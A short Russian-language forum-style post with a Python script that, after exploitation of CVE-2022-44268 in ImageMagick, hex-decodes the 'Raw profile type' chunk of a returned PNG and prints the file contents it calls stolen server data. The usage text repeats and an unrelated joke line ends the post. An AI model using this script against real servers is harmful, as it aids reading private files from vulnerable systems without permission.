Небольшой скрипт для CVE-2022-44268, для быстрого извлечения профиля из PNG файла. Требуется модуль PIL.
Использование: script.py image.png
Если сервер затронула эта уязвимость, то данный скрипт выведет украденные данные читабельным текстом. identify -verbose, как оказалось, отображает профиль не всегда (например, когда в нём данные в YAML).
Код:
from PIL import Image
import sys
if (len(sys.argv) < 2):
sys.exit(-1)
img = Image.open(sys.argv[1])
img.load()
try:
pf = img.info['Raw profile type']
print (bytes.fromhex(pf).decode())
except:
print("There is no raw profile")
img.close()Использование: script.py image.png
Если сервер затронула эта уязвимость, то данный скрипт выведет украденные данные читабельным текстом. identify -verbose, как оказалось, отображает профиль не всегда (например, когда в нём данные в YAML).
It's time to kick gum and chew ass. And i'm all out of ass.
